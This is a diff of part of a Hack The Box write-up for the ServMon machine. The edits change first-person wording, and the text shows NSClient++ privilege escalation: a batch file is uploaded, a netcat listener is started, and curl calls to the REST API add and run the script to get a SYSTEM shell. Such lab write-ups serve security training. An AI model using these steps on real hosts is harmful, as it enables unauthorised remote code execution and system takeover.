chdav/hackthebox-writeups/machines/Windows/ServMon/README.md

 $ scp evil.bat  nadine@10.10.10.184:/Temp
 ```

-On my Kali box, I start an `netcat` listener.
+On Kali, we'll start an `netcat` listener.

 ```
 $ nc -lvnp 4444
 ```

-Using the documentation, I run the following command to [add a script](https://docs.nsclient.org/api/rest/scripts/#add-script) that will call my batch file.
+Using the documentation, we run the following command to [add a script](https://docs.nsclient.org/api/rest/scripts/#add-script) that will call our batch file.

 ```
 $ curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat --data-binary @evil.bat
 ```

-And finally, I will [execute the command](https://docs.nsclient.org/api/rest/queries/#command-execute) to run the script.
+And finally, we will [execute the command](https://docs.nsclient.org/api/rest/queries/#command-execute) to run the script.

 ```
 $ curl -s -k -u admin https://localhost:8443/api/v1/queries/evil/commands/execute?time=3m
 ```

-My listener successfully connects, and I now have system shell.
+Our listener successfully connects, and we now have system shell.

 ![](images/root.png)

-I capture the final flag on the Administrator's desktop.
+Let's capture the final flag on the Administrator's desktop.

 ![](images/root-flag.png)